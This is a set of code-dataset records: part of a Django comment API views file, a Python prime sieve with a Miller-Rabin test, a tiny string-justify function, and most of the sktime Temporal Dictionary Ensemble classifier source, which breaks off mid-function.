Response({'Detail': serializer.errors}, status=status.HTTP_400_BAD_REQUEST)\n data_list = serializer.list_data(**cld)\n if isinstance(data_list, Exception):\n return Response({'Detail': data_list.args}, status=status.HTTP_400_BAD_REQUEST)\n return Response(data_list, status=status.HTTP_200_OK)\n\n\nclass CommentDetail(generics.GenericAPIView):\n \"\"\"\n 点评详情\n \"\"\"\n permission_classes = (IsOwnerOrReadOnly,)\n\n def get_comment_detail(self, request, comment_id):\n kwargs = {'user_id': request.user.id,\n 'id': comment_id}\n return Comment.get_object(**kwargs)\n\n def post(self, request, *args, **kwargs):\n form = CommentDetailForm(request.data)\n if not form.is_valid():\n return Response({'Detail': form.errors}, status=status.HTTP_400_BAD_REQUEST)\n\n cld = form.cleaned_data\n detail = self.get_comment_detail(request, cld['id'])\n if isinstance(detail, Exception):\n return Response({'Detail': detail.args}, status=status.HTTP_400_BAD_REQUEST)\n serializer = CommentDetailSerializer(data=detail)\n if not serializer.is_valid():\n return Response({'Detail': serializer.errors}, status=status.HTTP_400_BAD_REQUEST)\n return Response(serializer.data, status=status.HTTP_200_OK)\n\n\nclass CommentForResourceList(APIView):\n \"\"\"\n 获取媒体资源的用户评论列表\n \"\"\"\n def get_comment_list(self, source_type, source_id):\n kwargs = {'source_type': source_type,\n 'source_id': source_id}\n return CommentCache().get_comment_list_by_source_id(**kwargs)\n # return Comment.filter_details(**kwargs)\n\n def post(self, request, *args, **kwargs):\n form = CommentForResourceListForm(request.data)\n if not form.is_valid():\n return Response({'Detail': form.errors}, status=status.HTTP_400_BAD_REQUEST)\n\n cld = form.cleaned_data\n comment_list = self.get_comment_list(cld['source_type'], cld['source_id'])\n serializer = CommentListSerializer(data=comment_list)\n if not serializer.is_valid():\n return Response({'Detail': serializer.errors}, status=status.HTTP_400_BAD_REQUEST)\n list_data = serializer.list_data(**cld)\n if isinstance(list_data, Exception):\n return Response({'Detail': list_data.args}, status=status.HTTP_400_BAD_REQUEST)\n return Response(list_data, status=status.HTTP_200_OK)\n\n\nclass CommentOpinionAction(generics.GenericAPIView):\n \"\"\"\n 用户对评论的评价(点赞、踩)\n \"\"\"\n permission_classes = (IsOwnerOrReadOnly,)\n\n def get_comment_opinion_record(self, request, comment_id):\n kwargs = {'user_id': request.user.id,\n 'comment_id': comment_id}\n return CommentOpinionRecord.get_object(**kwargs)\n\n def post(self, request, *args, **kwargs):\n form = CommentOpinionActionForm(request.data)\n if not form.is_valid():\n return Response({'Detail': form.errors}, status=status.HTTP_400_BAD_REQUEST)\n\n cld = form.cleaned_data\n record = self.get_comment_opinion_record(request, cld['comment_id'])\n if not isinstance(record, Exception):\n return Response({'Detail': 'Can not repeat operate.'}, status=status.HTTP_400_BAD_REQUEST)\n\n result = CommentOpinionModelAction.comment_opinion_action(request,\n comment_id=cld['comment_id'],\n action=cld['action'])\n if isinstance(result, Exception):\n return Response({'Detail': result.args}, status=status.HTTP_400_BAD_REQUEST)\n return Response({'Result': True}, status=status.HTTP_201_CREATED)\n\n","repo_name":"dennis1984/BYWebApp","sub_path":"comment/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":8393,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"31620340749","text":"#!/usr/bin/env python\n\n# First imported in p47\n\nimport math\nimport sys\nimport random\n\nclass Prime:\n _primes = []\n _is_prime = []\n _max = 1\n\n def __init__(self):\n self._primes = list((2,3,5,7))\n self._is_prime = list((False, False, True, True, False, True, False, True))\n self._max = 7\n \n def __init__(self, max):\n self._primes = list((2,3,5,7))\n self._is_prime = list((False, False, True, True, False, True, False, True))\n self._max = 7\n self._set_max(max)\n\n def _set_max(self, m):\n if m < self._max or self._primes[len(self._primes)-1] == m:\n return\n prev_max = self._max\n # expand\n for i in range(prev_max, m+1):\n self._is_prime.append(True)\n prev_max = self._max\n # step through known primes\n for p in self._primes:\n x = prev_max + (p - (prev_max % p))\n if x == p:\n x += p\n while x <= m:\n self._is_prime[x] = False\n x += p\n # search for unmarked\n i = prev_max + 1\n while i <= m: # possible new primes\n if self._is_prime[i]: # unmarked\n # mark\n p = i\n self._primes.append(p) # add new prime\n x = i + p # move to 2p\n while x <= m: # 2p, 3p, 4p, ...\n self._is_prime[x] = False\n x += p\n i += 2 # must be odd (unless 2)\n else:\n i += 1\n # update the maximum\n self._max = m\n\n def is_prime(self, i):\n if self._max < i:\n self._set_max(i)\n return self._is_prime[i]\n\n def num_distinct_primes(self, n, max_num):\n if self.is_prime(n):\n return 1\n c = 0\n for p in self._primes:\n if n < p:\n break\n if 0 == n % p:\n c += 1\n if max_num < c:\n return c\n if self._max < n:\n self._set_max(self._max * 2) # double it\n return self.num_distinct_primes(n, max_num)\n return c\n\n def get_max(self):\n return self._max\n\n def get_primes(self):\n i = max(self._primes) + 1\n while i <= self._max:\n if self._is_prime[i]:\n self._primes.append(i)\n i += 1\n return self._primes\n\n def __miller_rabin_helper(self, a, s, d, n):\n a_p = pow(a, d, n)\n if a_p == 1:\n return True\n for j in xrange(s-1):\n if a_p == n - 1:\n return True\n a_p = (a_p * a_p) % n\n return (a_p == n - 1)\n\n def miller_rabin(self, n, k):\n if n <= self._max:\n return self.is_prime(n)\n # compute s and d\n d = n - 1\n s = 0\n while 0 == d % 2:\n d >>= 1\n s += 1\n # test\n for i in xrange(k):\n a = 0\n while a == 0:\n a = random.randrange(n)\n if not self.__miller_rabin_helper(a, s, d, n):\n return False\n return True\n","repo_name":"nh13/euler","sub_path":"src/prime.py","file_name":"prime.py","file_ext":"py","file_size_in_byte":3144,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"12118440617","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Mar 20 10:53:01 2014\n\n@author: cicek\n\"\"\"\n\ndef right_justify(s):\n l = len(s)\n l = 70-l\n e = ' '\n r=l*e+s\n print(r)\n \n \n \n ","repo_name":"cicekozkan/python-examples","sub_path":"right_justify.py","file_name":"right_justify.py","file_ext":"py","file_size_in_byte":191,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"33996882940","text":"\"\"\"TDE classifiers.\n\nDictionary based TDE classifiers based on SFA transform. Contains a single IndividualTDE\nand TDE.\n\"\"\"\n\n__author__ = [\"MatthewMiddlehurst\"]\n__all__ = [\"TemporalDictionaryEnsemble\", \"IndividualTDE\", \"histogram_intersection\"]\n\nimport math\nimport time\nfrom collections import defaultdict\n\nimport numpy as np\nfrom joblib import Parallel, delayed\nfrom sklearn import preprocessing\nfrom sklearn.kernel_ridge import KernelRidge\nfrom sklearn.utils import check_random_state\n\nfrom sktime.classification.base import BaseClassifier\nfrom sktime.transformations.panel.dictionary_based import SFA\nfrom sktime.utils.validation.panel import check_X_y\nfrom sktime.utils.warnings import warn\n\n\nclass TemporalDictionaryEnsemble(BaseClassifier):\n \"\"\"Temporal Dictionary Ensemble (TDE).\n\n Implementation of the dictionary based Temporal Dictionary Ensemble as described\n in [1]_.\n\n Overview: Input \"n\" series length \"m\" with \"d\" dimensions\n TDE searches \"k\" parameter values selected using a Gaussian processes\n regressor, evaluating each with a LOOCV. It then retains \"s\"\n ensemble members.\n There are six primary parameters for individual classifiers:\n - alpha: alphabet size\n - w: window length\n - l: word length\n - p: normalise/no normalise\n - h: levels\n - b: MCB/IGB\n For any combination, an individual TDE classifier slides a window of\n length w along the series. The w length window is shortened to\n an l length word through taking a Fourier transform and keeping the\n first l/2 complex coefficients. These lcoefficients are then discretised\n into alpha possible values, to form a word length l using breakpoints\n found using b. A histogram of words for each series is formed and stored,\n using a spatial pyramid of h levels. For multivariate series, accuracy\n from a reduced histogram is used to select dimensions.\n\n fit involves finding n histograms.\n predict uses 1 nearest neighbour with a the histogram intersection\n distance function.\n\n Parameters\n ----------\n n_parameter_samples : int, default=250\n Number of parameter combinations to consider for the final ensemble.\n max_ensemble_size : int, default=50\n Maximum number of estimators in the ensemble.\n max_win_len_prop : float, default=1\n Maximum window length as a proportion of series length, must be between 0 and 1.\n min_window : int, default=10\n Minimum window length.\n randomly_selected_params: int, default=50\n Number of parameters randomly selected before the Gaussian process parameter\n selection is used.\n bigrams : boolean or None, default=None\n Whether to use bigrams, defaults to true for univariate data and false for\n multivariate data.\n dim_threshold : float, default=0.85\n Dimension accuracy threshold for multivariate data, must be between 0 and 1.\n max_dims : int, default=20\n Max number of dimensions per classifier for multivariate data.\n time_limit_in_minutes : int, default=0\n Time contract to limit build time in minutes, overriding n_parameter_samples.\n Default of 0 means n_parameter_samples is used.\n contract_max_n_parameter_samples : int, default=np.inf\n Max number of parameter combinations to consider when time_limit_in_minutes is\n set.\n typed_dict : bool, default=True\n Use a numba typed Dict to store word counts. May increase memory usage, but will\n be faster for larger datasets. As the Dict cannot be pickled currently, there\n will be some overhead converting it to a python dict with multiple threads and\n pickling.\n save_train_predictions : bool, default=False\n Save the ensemble member train predictions in fit for use in _get_train_probs\n leave-one-out cross-validation.\n n_jobs : int, default=1\n The number of jobs to run in parallel for both `fit` and `predict`.\n ``-1`` means using all processors.\n random_state : int or None, default=None\n Seed for random number generation.\n\n Attributes\n ----------\n n_classes_ : int\n The number of classes.\n classes_ : list\n The classes labels.\n n_instances_ : int\n The number of train cases.\n n_dims_ : int\n The number of dimensions per case.\n series_length_ : int\n The length of each series.\n n_estimators_ : int\n The final number of classifiers used (<= max_ensemble_size)\n estimators_ : list of shape (n_estimators) of IndividualTDE\n The collections of estimators trained in fit.\n weights_ : list of shape (n_estimators) of float\n Weight of each estimator in the ensemble.\n\n See Also\n --------\n IndividualTDE, ContractableBOSS\n\n Notes\n -----\n For the Java version, see\n `TSML `_.\n\n References\n ----------\n .. [1] Matthew Middlehurst, James Large, Gavin Cawley and Anthony Bagnall\n \"The Temporal Dictionary Ensemble (TDE) Classifier for Time Series\n Classification\", in proceedings of the European Conference on Machine Learning\n and Principles and Practice of Knowledge Discovery in Databases, 2020.\n\n Examples\n --------\n >>> from sktime.classification.dictionary_based import TemporalDictionaryEnsemble\n >>> from sktime.datasets import load_unit_test\n >>> X_train, y_train = load_unit_test(split=\"train\", return_X_y=True)\n >>> X_test, y_test = load_unit_test(split=\"test\", return_X_y=True) # doctest: +SKIP\n >>> clf = TemporalDictionaryEnsemble(\n ... n_parameter_samples=10,\n ... max_ensemble_size=3,\n ... randomly_selected_params=5,\n ... ) # doctest: +SKIP\n >>> clf.fit(X_train, y_train) # doctest: +SKIP\n TemporalDictionaryEnsemble(...)\n >>> y_pred = clf.predict(X_test) # doctest: +SKIP\n \"\"\"\n\n _tags = {\n \"capability:multivariate\": True,\n \"capability:train_estimate\": True,\n \"capability:contractable\": True,\n \"capability:multithreading\": True,\n \"capability:predict_proba\": True,\n \"classifier_type\": \"dictionary\",\n \"python_dependencies\": \"numba\",\n }\n\n def __init__(\n self,\n n_parameter_samples=250,\n max_ensemble_size=50,\n max_win_len_prop=1,\n min_window=10,\n randomly_selected_params=50,\n bigrams=None,\n dim_threshold=0.85,\n max_dims=20,\n time_limit_in_minutes=0.0,\n contract_max_n_parameter_samples=np.inf,\n typed_dict=True,\n save_train_predictions=False,\n n_jobs=1,\n random_state=None,\n ):\n self.n_parameter_samples = n_parameter_samples\n self.max_ensemble_size = max_ensemble_size\n self.max_win_len_prop = max_win_len_prop\n self.min_window = min_window\n self.randomly_selected_params = randomly_selected_params\n self.bigrams = bigrams\n\n # multivariate\n self.dim_threshold = dim_threshold\n self.max_dims = max_dims\n\n self.time_limit_in_minutes = time_limit_in_minutes\n self.contract_max_n_parameter_samples = contract_max_n_parameter_samples\n self.typed_dict = typed_dict\n self.save_train_predictions = save_train_predictions\n self.random_state = random_state\n self.n_jobs = n_jobs\n\n self.n_instances_ = 0\n self.n_dims_ = 0\n self.series_length_ = 0\n self.n_estimators_ = 0\n self.estimators_ = []\n self.weights_ = []\n\n self._word_lengths = [16, 14, 12, 10, 8]\n self._norm_options = [True, False]\n self._levels = [1, 2, 3]\n self._igb_options = [True, False]\n self._alphabet_size = 4\n self._weight_sum = 0\n self._prev_parameters_x = []\n self._prev_parameters_y = []\n self._min_window = min_window\n\n super().__init__()\n\n def _fit(self, X, y):\n \"\"\"Fit an ensemble on cases (X,y), where y is the target variable.\n\n Build an ensemble of base TDE classifiers from the training set (X,\n y), through an optimised selection over the para space to make a fixed size\n ensemble of the best.\n\n Parameters\n ----------\n X : 3D np.array of shape = [n_instances, n_dimensions, series_length]\n The training data.\n y : array-like, shape = [n_instances]\n The class labels.\n\n Returns\n -------\n self :\n Reference to self.\n\n Notes\n -----\n Changes state by creating a fitted model that updates attributes\n ending in \"_\" and sets is_fitted flag to True.\n \"\"\"\n if self.n_parameter_samples <= self.randomly_selected_params:\n warn(\n \"TemporalDictionaryEnsemble warning: n_parameter_samples <= \"\n \"randomly_selected_params, ensemble member parameters will be \"\n \"fully randomly selected.\",\n obj=self,\n stacklevel=2,\n )\n\n self.n_instances_, self.n_dims_, self.series_length_ = X.shape\n\n self.estimators_ = []\n self.weights_ = []\n self._prev_parameters_x = []\n self._prev_parameters_y = []\n\n # Window length parameter space dependent on series length\n max_window_searches = self.series_length_ / 4\n max_window = int(self.series_length_ * self.max_win_len_prop)\n\n if self.min_window >= max_window:\n self._min_window = max_window\n warn(\n f\"TemporalDictionaryEnsemble warning: min_window = \"\n f\"{self.min_window} is larger than max_window = {max_window}.\"\n f\" min_window has been set to {max_window}.\",\n obj=self,\n stacklevel=2,\n )\n\n win_inc = int((max_window - self._min_window) / max_window_searches)\n if win_inc < 1:\n win_inc = 1\n\n possible_parameters = self._unique_parameters(max_window, win_inc)\n num_classifiers = 0\n subsample_size = int(self.n_instances_ * 0.7)\n lowest_acc = 1\n lowest_acc_idx = 0\n\n time_limit = self.time_limit_in_minutes * 60\n start_time = time.time()\n train_time = 0\n if time_limit > 0:\n n_parameter_samples = 0\n contract_max_n_parameter_samples = self.contract_max_n_parameter_samples\n else:\n n_parameter_samples = self.n_parameter_samples\n contract_max_n_parameter_samples = np.inf\n\n rng = check_random_state(self.random_state)\n\n if self.bigrams is None:\n if self.n_dims_ > 1:\n use_bigrams = False\n else:\n use_bigrams = True\n else:\n use_bigrams = self.bigrams\n\n # use time limit or n_parameter_samples if limit is 0\n while (\n (\n train_time < time_limit\n and num_classifiers < contract_max_n_parameter_samples\n )\n or num_classifiers < n_parameter_samples\n ) and len(possible_parameters) > 0:\n if num_classifiers < self.randomly_selected_params:\n parameters = possible_parameters.pop(\n rng.randint(0, len(possible_parameters))\n )\n else:\n scaler = preprocessing.StandardScaler()\n scaler.fit(self._prev_parameters_x)\n gp = KernelRidge(kernel=\"poly\", degree=1)\n gp.fit(\n scaler.transform(self._prev_parameters_x), self._prev_parameters_y\n )\n preds = gp.predict(scaler.transform(possible_parameters))\n parameters = possible_parameters.pop(\n rng.choice(np.flatnonzero(preds == preds.max()))\n )\n\n subsample = rng.choice(\n self.n_instances_, size=subsample_size, replace=False\n )\n X_subsample = X[subsample]\n y_subsample = y[subsample]\n\n tde = IndividualTDE(\n *parameters,\n alphabet_size=self._alphabet_size,\n bigrams=use_bigrams,\n dim_threshold=self.dim_threshold,\n max_dims=self.max_dims,\n typed_dict=self.typed_dict,\n n_jobs=self._threads_to_use,\n random_state=self.random_state,\n )\n tde.fit(X_subsample, y_subsample)\n tde._subsample = subsample\n\n tde._accuracy = self._individual_train_acc(\n tde,\n y_subsample,\n subsample_size,\n 0 if num_classifiers < self.max_ensemble_size else lowest_acc,\n )\n if tde._accuracy > 0:\n weight = math.pow(tde._accuracy, 4)\n else:\n weight = 0.000000001\n\n if num_classifiers < self.max_ensemble_size:\n if tde._accuracy < lowest_acc:\n lowest_acc = tde._accuracy\n lowest_acc_idx = num_classifiers\n self.weights_.append(weight)\n self.estimators_.append(tde)\n elif tde._accuracy > lowest_acc:\n self.weights_[lowest_acc_idx] = weight\n self.estimators_[lowest_acc_idx] = tde\n lowest_acc, lowest_acc_idx = self._worst_ensemble_acc()\n\n self._prev_parameters_x.append(parameters)\n self._prev_parameters_y.append(tde._accuracy)\n\n num_classifiers += 1\n train_time = time.time() - start_time\n\n self.n_estimators_ = len(self.estimators_)\n self._weight_sum = np.sum(self.weights_)\n\n return self\n\n def _predict(self, X) -> np.ndarray:\n \"\"\"Predict class values of n instances in X.\n\n Parameters\n ----------\n X : 3D np.array of shape = [n_instances, n_dimensions, series_length]\n The data to make predictions for.\n\n Returns\n -------\n y : array-like, shape = [n_instances]\n Predicted class labels.\n \"\"\"\n rng = check_random_state(self.random_state)\n return np.array(\n [\n self.classes_[int(rng.choice(np.flatnonzero(prob == prob.max())))]\n for prob in self._predict_proba(X)\n ]\n )\n\n def _predict_proba(self, X) -> np.ndarray:\n \"\"\"Predict class probabilities for n instances in X.\n\n Parameters\n ----------\n X : 3D np.array of shape = [n_instances, n_dimensions, series_length]\n The data to make predict probabilities for.\n\n Returns\n -------\n y : array-like, shape = [n_instances, n_classes_]\n Predicted probabilities using the ordering in classes_.\n \"\"\"\n _, _, series_length = X.shape\n if series_length != self.series_length_:\n raise TypeError(\n \"ERROR number of attributes in the train does not match \"\n \"that in the test data\"\n )\n\n sums = np.zeros((X.shape[0], self.n_classes_))\n\n for n, clf in enumerate(self.estimators_):\n preds = clf.predict(X)\n for i in range(0, X.shape[0]):\n sums[i, self._class_dictionary[preds[i]]] += self.weights_[n]\n\n return sums / (np.ones(self.n_classes_) * self._weight_sum)\n\n def _worst_ensemble_acc(self):\n min_acc = 1.0\n min_acc_idx = 0\n\n for c, classifier in enumerate(self.estimators_):\n if classifier._accuracy < min_acc:\n min_acc = classifier._accuracy\n min_acc_idx = c\n\n return min_acc, min_acc_idx\n\n def _unique_parameters(self, max_window, win_inc):\n possible_parameters = [\n [win_size, word_len, normalise, levels, igb]\n for normalise in self._norm_options\n for win_size in range(self._min_window, max_window + 1, win_inc)\n for word_len in self._word_lengths\n for levels in self._levels\n for igb in self._igb_options\n ]\n\n return possible_parameters\n\n def _get_train_probs(self, X, y, train_estimate_method=\"loocv\") -> np.ndarray:\n self.check_is_fitted()\n X, y = check_X_y(X, y, coerce_to_numpy=True)\n\n n_instances, n_dims, series_length = X.shape\n\n if (\n n_instances != self.n_instances_\n or n_dims != self.n_dims_\n or series_length != self.series_length_\n ):\n raise ValueError(\n \"n_instances, n_dims, series_length mismatch. X should be \"\n \"the same as the training data used in fit for generating train \"\n \"probabilities.\"\n )\n\n results = np.zeros((n_instances, self.n_classes_))\n divisors = np.zeros(n_instances)\n\n if train_estimate_method.lower() == \"loocv\":\n for i, clf in enumerate(self.estimators_):\n subsample = clf._subsample\n preds = (\n clf._train_predictions\n if self.save_train_predictions\n else Parallel(n_jobs=self._threads_to_use, prefer=\"threads\")(\n delayed(clf._train_predict)(\n i,\n )\n for i in range(len(subsample))\n )\n )\n\n for n, pred in enumerate(preds):\n results[subsample[n]][\n self._class_dictionary[pred]\n ] += self.weights_[i]\n divisors[subsample[n]] += self.weights_[i]\n elif train_estimate_method.lower() == \"oob\":\n indices = range(n_instances)\n for i, clf in enumerate(self.estimators_):\n oob = [n for n in indices if n not in clf._subsample]\n\n if len(oob) == 0:\n continue\n\n preds = clf.predict(X[oob])\n\n for n, pred in enumerate(preds):\n results[oob[n]][self._class_dictionary[pred]] += self.weights_[i]\n divisors[oob[n]] += self.weights_[i]\n else:\n raise ValueError(\n \"Invalid train_estimate_method. Available options: loocv, oob\"\n )\n\n for i in range(n_instances):\n results[i] = (\n np.ones(self.n_classes_) * (1 / self.n_classes_)\n if divisors[i] == 0\n else results[i] / (np.ones(self.n_classes_) * divisors[i])\n )\n\n return results\n\n def _individual_train_acc(self, tde, y, train_size, lowest_acc):\n correct = 0\n required_correct = int(lowest_acc * train_size)\n\n if self._threads_to_use > 1:\n c = Parallel(n_jobs=self._threads_to_use, prefer=\"threads\")(\n delayed(tde._train_predict)(\n i,\n )\n for i in range(train_size)\n )\n\n for i in range(train_size):\n if correct + train_size - i < required_correct:\n return -1\n elif c[i] == y[i]:\n correct += 1\n\n if self.save_train_predictions:\n tde._train_predictions.append(c[i])\n\n else:\n for i in range(train_size):\n if correct + train_size - i < required_correct:\n return -1\n\n c = tde._train_predict(i)\n\n if c == y[i]:\n correct += 1\n\n if self.save_train_predictions:\n tde._train_predictions.append(c)\n\n return correct / train_size\n\n @classmethod\n def get_test_params(cls, parameter_set=\"default\"):\n \"\"\"Return testing parameter settings for the estimator.\n\n Parameters\n ----------\n parameter_set : str, default=\"default\"\n Name of the set of test parameters to return, for use in tests. If no\n special parameters are defined for a value, will return `\"default\"` set.\n For classifiers, a \"default\" set of parameters should be provided for\n general testing, and a \"results_comparison\" set for comparing against\n previously recorded results if the general set does not produce suitable\n probabilities to compare against.\n\n Returns\n -------\n params : dict or list of dict, default={}\n Parameters to create testing instances of the class.\n Each dict are parameters to construct an \"interesting\" test instance, i.e.,\n `MyClass(**params)` or `MyClass(**params[i])` creates a valid test instance.\n `create_test_instance` uses the first (or only) dictionary in `params`.\n \"\"\"\n if parameter_set == \"results_comparison\":\n return {\n \"n_parameter_samples\": 10,\n \"max_ensemble_size\": 5,\n \"randomly_selected_params\": 5,\n }\n else:\n return {\n \"n_parameter_samples\": 5,\n \"max_ensemble_size\": 2,\n \"randomly_selected_params\": 3,\n \"save_train_predictions\": True,\n }\n\n\nclass IndividualTDE(BaseClassifier):\n \"\"\"Single TDE classifier, an extension of the Bag of SFA Symbols (BOSS) model.\n\n Base classifier for the TDE classifier. Implementation of single TDE base model\n from Middlehurst (2021). [1]_\n\n Overview: input \"n\" series of length \"m\" and IndividualTDE performs a SFA\n transform to form a sparse dictionary of discretised words. The resulting\n dictionary is used with the histogram intersection distance function in a\n 1-nearest neighbor.\n\n fit involves finding \"n\" histograms.\n\n predict uses 1 nearest neighbor with the histogram intersection distance function.\n\n Parameters\n ----------\n window_size : int, default=10\n Size of the window to use in the SFA transform.\n word_length : int, default=8\n Length of word to use to use in the SFA transform.\n norm : bool, default=False\n Whether to normalize SFA words by dropping the first Fourier coefficient.\n levels : int, default=1\n The number of spatial pyramid levels for the SFA transform.\n igb : bool, default=False\n Whether to use Information Gain Binning (IGB) or\n Multiple Coefficient Binning (MCB) for the SFA transform.\n alphabet_size : default=4\n Number of possible letters (values) for each word.\n bigrams : bool, default=False\n Whether to record word bigrams in the SFA transform.\n dim_threshold : float, default=0.85\n Accuracy threshold as a proportion of the highest accuracy dimension for words\n extracted from each dimensions. Only applicable for multivariate data.\n max_dims : int, default=20\n Maximum number of dimensions words are extracted from. Only applicable for\n multivariate data.\n typed_dict : bool, default=True\n Use a numba TypedDict to store word counts. May increase memory usage, but will\n be faster for larger datasets.\n n_jobs : int, default=1\n The number of jobs to run in parallel for both `fit` and `predict`.\n ``-1`` means using all processors.\n random_state : int or None, default=None\n Seed for random, integer.\n\n Attributes\n ----------\n n_classes_ : int\n The number of classes.\n classes_ : list\n The classes labels.\n n_instances_ : int\n The number of train cases.\n n_dims_ : int\n The number of dimensions per case.\n series_length_ : int\n The length of each series.\n\n See Also\n --------\n TemporalDictionaryEnsemble, SFA\n\n Notes\n -----\n For the Java version, see\n `TSML `_.\n\n References\n ----------\n .. [1] Matthew Middlehurst, James Large, Gavin Cawley and Anthony Bagnall\n \"The Temporal Dictionary Ensemble (TDE) Classifier for Time Series\n Classification\", in proceedings of the European Conference on Machine Learning\n and Principles and Practice of Knowledge Discovery in Databases, 2020.\n\n Examples\n --------\n >>> from sktime.classification.dictionary_based import IndividualTDE\n >>> from sktime.datasets import load_unit_test\n >>> X_train, y_train = load_unit_test(split=\"train\", return_X_y=True)\n >>> X_test, y_test = load_unit_test(split=\"test\", return_X_y=True) # doctest: +SKIP\n >>> clf = IndividualTDE() # doctest: +SKIP\n >>> clf.fit(X_train, y_train) # doctest: +SKIP\n IndividualTDE(...)\n >>> y_pred = clf.predict(X_test) # doctest: +SKIP\n \"\"\"\n\n _tags = {\n \"capability:multivariate\": True,\n \"capability:multithreading\": True,\n \"python_dependencies\": \"numba\",\n }\n\n def __init__(\n self,\n window_size=10,\n word_length=8,\n norm=False,\n levels=1,\n igb=False,\n alphabet_size=4,\n bigrams=True,\n dim_threshold=0.85,\n max_dims=20,\n typed_dict=True,\n n_jobs=1,\n random_state=None,\n ):\n self.window_size = window_size\n self.word_length = word_length\n self.norm = norm\n self.levels = levels\n self.igb = igb\n self.alphabet_size = alphabet_size\n self.bigrams = bigrams\n\n # multivariate\n self.dim_threshold = dim_threshold\n self.max_dims = max_dims\n\n self.typed_dict = typed_dict\n self.n_jobs = n_jobs\n self.random_state = random_state\n\n self.n_instances_ = 0\n self.n_dims_ = 0\n self.series_length_ = 0\n\n self._transformers = []\n self._transformed_data = []\n self._class_vals = []\n self._dims = []\n self._highest_dim_bit = 0\n self._accuracy = 0\n self._subsample = []\n self._train_predictions = []\n\n super().__init__()\n\n # todo remove along with BOSS and SFA workarounds when Dict becomes serialisable.\n def __getstate__(self):\n \"\"\"Return state as dictionary for pickling, required for typed Dict objects.\"\"\"\n state = self.__dict__.copy()\n if self.typed_dict:\n nl = [None] * len(self._transformed_data)\n for i, ndict in enumerate(state[\"_transformed_data\"]):\n pdict = dict()\n for key, val in ndict.items():\n pdict[key] = val\n nl[i] = pdict\n state[\"_transformed_data\"] = nl\n return state\n\n def __setstate__(self, state):\n \"\"\"Set current state using input pickling, required for typed Dict objects.\"\"\"\n from numba import types\n from numba.typed import Dict\n\n self.__dict__.update(state)\n if self.typed_dict:\n nl = [None] * len(self._transformed_data)\n for i, pdict in enumerate(self._transformed_data):\n ndict = (\n Dict.empty(\n key_type=types.UniTuple(types.int64, 2), value_type=types.uint32\n )\n if self.levels > 1 or self.n_dims_ > 1\n else Dict.empty(key_type=types.int64, value_type=types.uint32)\n )\n for key, val in pdict.items():\n ndict[key] = val\n nl[i] = ndict\n self._transformed_data = nl\n\n def _fit(self, X, y):\n \"\"\"Fit a single base TDE classifier on n_instances cases (X,y).\n\n Parameters\n ----------\n X : 3D np.array of shape = [n_instances, n_dimensions, series_length]\n The training data.\n y : array-like, shape = [n_instances]\n The class labels.\n\n Returns\n -------\n self :\n Reference to self.\n\n Notes\n -----\n Changes state by creating a fitted model that updates attributes\n ending in \"_\" and sets is_fitted flag to True.\n \"\"\"\n from numba import types\n from numba.typed import Dict\n\n self.n_instances_, self.n_dims_, self.series_length_ = X.shape\n self._class_vals = y\n\n # select dimensions using accuracy estimate if multivariate\n if self.n_dims_ > 1:\n self._dims, self._transformers = self._select_dims(X, y)\n\n words = (\n [\n Dict.empty(\n key_type=types.UniTuple(types.int64, 2), value_type=types.uint32\n )\n for _ in range(self.n_instances_)\n ]\n if self.typed_dict\n else [defaultdict(int) for _ in range(self.n_instances_)]\n )\n\n for i, dim in enumerate(self._dims):\n X_dim = X[:, dim, :].reshape(self.n_instances_, 1, self.series_length_)\n dim_words = self._transformers[i].transform(X_dim, y)\n dim_words = dim_words[0]\n\n for n in range(self.n_instances_):\n if self.typed_dict:\n for word, count in dim_words[n].items():\n if self.levels > 1:\n words[n][\n (word[0], word[1] << self._highest_dim_bit | dim)\n ] = count\n else:\n words[n][(word, dim)] = count\n else:\n for word, count in dim_words[n].items():\n words[n][word << self._highest_dim_bit | dim] = count\n\n self._transformed_data = words\n else:\n self._transformers.append(\n SFA(\n word_length=self.word_length,\n alphabet_size=self.alphabet_size,\n window_size=self.window_size,\n norm=self.norm,\n levels=self.levels,\n binning_method=\"information-gain\" if self.igb else \"equi-depth\",\n bigrams=self.bigrams,\n remove_repeat_words=True,\n lower_bounding=False,\n save_words=False,\n use_fallback_dft=True,\n typed_dict=self.typed_dict,\n n_jobs=self._threads_to_use,\n )\n )\n sfa = self._transformers[0].fit_transform(X, y)\n self._transformed_data = sfa[0]\n\n def _predict(self, X):\n \"\"\"Predict class values of all instances in X.\n\n Parameters\n ----------\n X : 3D np.array of shape = [n_instances, n_dimensions, series_length]\n The data to make predictions for.\n\n Returns\n -------\n y : array-like, shape = [n_instances]\n Predicted class labels.\n \"\"\"\n from numba import types\n from numba.typed import Dict\n\n num_cases = X.shape[0]\n\n if self.n_dims_ > 1:\n words = (\n [\n Dict.empty(\n key_type=types.UniTuple(types.int64, 2), value_type=types.uint32\n )\n for _ in range(num_cases)\n ]\n if self.typed_dict\n else [defaultdict(int) for _ in range(num_cases)]\n )\n\n for i, dim in enumerate(self._dims):\n X_dim = X[:, dim, :].reshape(num_cases, 1, self.series_length_)\n dim_words = self._transformers[i].transform(X_dim)\n dim_words = dim_words[0]\n\n for n in range(num_cases):\n if self.typed_dict:\n for word, count in dim_words[n].items():\n if self.levels > 1:\n words[n][\n (word[0], word[1] << self._highest_dim_bit | dim)\n ] = count\n else:\n words[n][(word, dim)] = count\n else:\n for word, count in dim_words[n].items():\n words[n][word << self._highest_dim_bit | dim] = count\n\n test_bags = words\n else:\n test_bags = self._transformers[0].transform(X)\n test_bags = test_bags[0]\n\n classes = Parallel(n_jobs=self._threads_to_use, prefer=\"threads\")(\n delayed(self._test_nn)(\n test_bag,\n )\n for test_bag in test_bags\n )\n\n return np.array(classes)\n\n def _test_nn(self, test_bag):\n rng = check_random_state(self.random_state)\n\n best_sim = -1\n nn = None\n\n for n, bag in enumerate(self._transformed_data):\n sim = histogram_intersection(test_bag, bag)\n\n if sim > best_sim or (sim == best_sim and rng.random() < 0.5):\n best_sim = sim\n nn = self._class_vals[n]\n\n return nn\n\n def _select_dims(self, X, y):\n self._highest_dim_bit = (math.ceil(math.log2(self.n_dims_))) + 1\n accs = []\n transformers = []\n\n # select dimensions based on reduced bag size accuracy\n for i in range(self.n_dims_):\n self._dims.append(i)\n transformers.append(\n SFA(\n 